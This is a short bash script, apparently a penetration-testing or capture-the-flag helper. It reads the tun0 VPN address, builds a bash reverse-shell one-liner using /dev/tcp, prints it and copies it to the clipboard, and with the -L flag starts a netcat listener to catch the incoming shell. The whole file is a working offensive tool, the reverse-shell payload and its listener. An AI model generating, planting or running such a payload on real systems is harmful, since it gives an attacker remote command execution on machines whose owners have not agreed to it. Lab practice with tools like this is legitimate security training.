#!/bin/bash

if [ "$#" -lt 1 ]; then
    echo "Usage: $0 <port> [-L]"
    exit 1
fi

port="$1"
IP=$(ip addr show tun0 | awk '/inet / {print $2}' | cut -d'/' -f1)
SHELL="bash -i >& /dev/tcp/$IP/$port 0>&1"

echo "$SHELL"
echo "$SHELL" | wl-copy

if [ "$UID" -eq 0 ]; then
    echo "Running as root. Exiting."
    exit 1
fi

if [ "$port" -lt 1024 ]; then
    echo "Port is not accessible. Exiting."
    exit 1
fi

if [ -n "$2" ] && [ "$2" == "-L" ]; then
    echo "Starting listener on port $port"
    nc -lvvnp "$port"
fi

